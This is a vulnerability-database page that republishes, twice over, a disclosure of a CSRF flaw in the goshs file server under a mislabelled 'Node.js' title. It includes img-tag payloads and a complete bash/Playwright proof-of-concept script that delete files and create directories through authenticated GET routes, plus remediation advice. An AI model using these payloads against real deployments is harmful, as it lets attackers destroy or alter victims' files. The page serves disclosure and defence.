Node.js CVE-2026-40883
MEDIUMSeverity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as ?delete and ?mkdir because goshs relies on HTTP basic auth alone and performs no CSRF, Origin, or Referer validation for those routes. I reproduced this on v2.0.0-beta.5.
Details
The vulnerable request handling is reachable through normal GET requests:
httpserver/handler.go:118-123dispatches?mkdirdirectly tohandleMkdir()httpserver/handler.go:180-186dispatches?deletedirectly todeleteFile()
Authentication is enforced only by HTTP basic auth:
httpserver/middleware.go:20-87accepts any request that presents valid cached or replayed basic-auth credentials
The resulting state changes hit filesystem mutation sinks:
httpserver/handler.go:683-718callsos.RemoveAll()indeleteFile()httpserver/handler.go:961-1000callsos.MkdirAll()inhandleMkdir()
Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:
<img src="http://127.0.0.1:18095/victim.txt?delete"><img src="http://127.0.0.1:18095/csrfmade?mkdir">
If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.
PoC
Manual verification commands used:
Terminal 1
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./
rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site
mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site
printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt
cat > /tmp/goshs_csrf_site/delete.html <<'HTML'
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:18095/victim.txt?delete">
</body>
</html>
HTML
cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML'
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:18095/csrfmade?mkdir">
</body>
</html>
HTML
/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p'Terminal 2
python3 -m http.server 18889 --directory /tmp/goshs_csrf_siteVictim actions:
- Open
http://127.0.0.1:18095/in a browser and authenticate withu:p. - Visit
http://127.0.0.1:18889/delete.html. - Visit
http://127.0.0.1:18889/mkdir.html.
Two terminal commands I ran during local validation:
test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED
test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSINGExpected result:
- the first check prints
DELETED - the second check prints
CREATED
PoC Video 1:
https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473
Single-script verification:
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3'Observed script result:
Delete status: DELETEDmkdir status: CREATED[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET
PoC Video 2:
https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede
gosh_poc3 script content:
#!/usr/bin/env bash
set -euo pipefail
REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
PLAY_DIR='/tmp/codex-playwright'
BIN='/tmp/goshs_beta5_csrf'
PORT='18095'
ATTACKER_PORT='18889'
CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
SITE="$WORKDIR/site"
GOSHS_PID=""
ATTACKER_PID=""
cleanup() {
if [[ -n "${ATTACKER_PID:-}" ]]; then
kill "${ATTACKER_PID}" >/dev/null 2>&1 || true
fi
if [[ -n "${GOSHS_PID:-}" ]]; then
kill "${GOSHS_PID}" >/dev/null 2>&1 || true
fi
}
trap cleanup EXIT
mkdir -p "$ROOT" "$SITE"
printf 'delete me\n' > "$ROOT/victim.txt"
cat > "$SITE/delete.html" <<HTML
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:${PORT}/victim.txt?delete">
</body>
</html>
HTML
cat > "$SITE/mkdir.html" <<HTML
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:${PORT}/csrfmade?mkdir">
</body>
</html>
HTML
echo "[1/6] Building goshs beta.5"
(cd "$REPO" && go build -o "$BIN" ./)
echo "[2/6] Starting goshs with HTTP basic auth"
"$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 &
GOSHS_PID=$!
for _ in $(seq 1 40); do
if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
break
fi
sleep 0.25
done
echo "[3/6] Serving attacker pages"
python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 &
ATTACKER_PID=$!
if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then
mkdir -p "$PLAY_DIR"
(cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null)
fi
if [[ ! -x "$CHROME" ]]; then
echo "[ERROR] Chrome not found at $CHROME" >&2
exit 1
fi
echo "[4/6] Visiting attacker pages from an authenticated browser"
node - <<'NODE'
const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core');
(async () => {
const browser = await chromium.launch({
headless: true,
executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
});
const context = await browser.newContext({
httpCredentials: { username: 'u', password: 'p' },
});
const page = await context.newPage();
await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' });
await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' });
await page.waitForTimeout(1200);
await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' });
await page.waitForTimeout(1200);
await browser.close();
})();
NODE
echo "[5/6] Verifying impact"
DELETE_STATUS="MISSING"
MKDIR_STATUS="MISSING"
if [[ ! -e "$ROOT/victim.txt" ]]; then
DELETE_STATUS="DELETED"
fi
if [[ -d "$ROOT/csrfmade" ]]; then
MKDIR_STATUS="CREATED"
fi
echo "[6/6] Results"
echo "Delete status: $DELETE_STATUS"
echo "mkdir status: $MKDIR_STATUS"
if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then
echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET'
else
echo '[RESULT] NOT REPRODUCED'
exit 1
fiImpact
This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.
Remediation
Suggested fixes:
- Move all state-changing functionality such as
deleteandmkdiroff GET routes and require non-idempotent methods such asPOSTorDELETE. - Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict
OriginandReferervalidation. - Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Analysis
Summary
goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as ?delete and ?mkdir because goshs relies on HTTP basic auth alone and performs no CSRF, Origin, or Referer validation for those routes. I reproduced this on v2.0.0-beta.5.
Details
The vulnerable request handling is reachable through normal GET requests:
httpserver/handler.go:118-123dispatches?mkdirdirectly tohandleMkdir()httpserver/handler.go:180-186dispatches?deletedirectly todeleteFile()
Authentication is enforced only by HTTP basic auth:
httpserver/middleware.go:20-87accepts any request that presents valid cached or replayed basic-auth credentials
The resulting state changes hit filesystem mutation sinks:
httpserver/handler.go:683-718callsos.RemoveAll()indeleteFile()httpserver/handler.go:961-1000callsos.MkdirAll()inhandleMkdir()
Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:
<img src="http://127.0.0.1:18095/victim.txt?delete"><img src="http://127.0.0.1:18095/csrfmade?mkdir">
If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.
PoC
Manual verification commands used:
Terminal 1
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./
rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site
mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site
printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt
cat > /tmp/goshs_csrf_site/delete.html <<'HTML'
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:18095/victim.txt?delete">
</body>
</html>
HTML
cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML'
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:18095/csrfmade?mkdir">
</body>
</html>
HTML
/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p'Terminal 2
python3 -m http.server 18889 --directory /tmp/goshs_csrf_siteVictim actions:
- Open
http://127.0.0.1:18095/in a browser and authenticate withu:p. - Visit
http://127.0.0.1:18889/delete.html. - Visit
http://127.0.0.1:18889/mkdir.html.
Two terminal commands I ran during local validation:
test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED
test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSINGExpected result:
- the first check prints
DELETED - the second check prints
CREATED
PoC Video 1:
https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473
Single-script verification:
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3'Observed script result:
Delete status: DELETEDmkdir status: CREATED[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET
PoC Video 2:
https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede
gosh_poc3 script content:
#!/usr/bin/env bash
set -euo pipefail
REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
PLAY_DIR='/tmp/codex-playwright'
BIN='/tmp/goshs_beta5_csrf'
PORT='18095'
ATTACKER_PORT='18889'
CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
SITE="$WORKDIR/site"
GOSHS_PID=""
ATTACKER_PID=""
cleanup() {
if [[ -n "${ATTACKER_PID:-}" ]]; then
kill "${ATTACKER_PID}" >/dev/null 2>&1 || true
fi
if [[ -n "${GOSHS_PID:-}" ]]; then
kill "${GOSHS_PID}" >/dev/null 2>&1 || true
fi
}
trap cleanup EXIT
mkdir -p "$ROOT" "$SITE"
printf 'delete me\n' > "$ROOT/victim.txt"
cat > "$SITE/delete.html" <<HTML
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:${PORT}/victim.txt?delete">
</body>
</html>
HTML
cat > "$SITE/mkdir.html" <<HTML
<!doctype html>
<html>
<body>
<img src="http://127.0.0.1:${PORT}/csrfmade?mkdir">
</body>
</html>
HTML
echo "[1/6] Building goshs beta.5"
(cd "$REPO" && go build -o "$BIN" ./)
echo "[2/6] Starting goshs with HTTP basic auth"
"$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 &
GOSHS_PID=$!
for _ in $(seq 1 40); do
if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
break
fi
sleep 0.25
done
echo "[3/6] Serving attacker pages"
python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 &
ATTACKER_PID=$!
if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then
mkdir -p "$PLAY_DIR"
(cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null)
fi
if [[ ! -x "$CHROME" ]]; then
echo "[ERROR] Chrome not found at $CHROME" >&2
exit 1
fi
echo "[4/6] Visiting attacker pages from an authenticated browser"
node - <<'NODE'
const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core');
(async () => {
const browser = await chromium.launch({
headless: true,
executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
});
const context = await browser.newContext({
httpCredentials: { username: 'u', password: 'p' },
});
const page = await context.newPage();
await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' });
await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' });
await page.waitForTimeout(1200);
await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' });
await page.waitForTimeout(1200);
await browser.close();
})();
NODE
echo "[5/6] Verifying impact"
DELETE_STATUS="MISSING"
MKDIR_STATUS="MISSING"
if [[ ! -e "$ROOT/victim.txt" ]]; then
DELETE_STATUS="DELETED"
fi
if [[ -d "$ROOT/csrfmade" ]]; then
MKDIR_STATUS="CREATED"
fi
echo "[6/6] Results"
echo "Delete status: $DELETE_STATUS"
echo "mkdir status: $MKDIR_STATUS"
if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then
echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET'
else
echo '[RESULT] NOT REPRODUCED'
exit 1
fiImpact
This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.
Remediation
Suggested fixes:
- Move all state-changing functionality such as
deleteandmkdiroff GET routes and require non-idempotent methods such asPOSTorDELETE. - Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict
OriginandReferervalidation. - Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-352 – Cross-Site Request Forgery (CSRF)
View allVendor StatusVendor
SUSE
Severity: HighShare
External POC / Exploit Code
Leaving vuln.today
GHSA-jrq5-hg6x-j6g3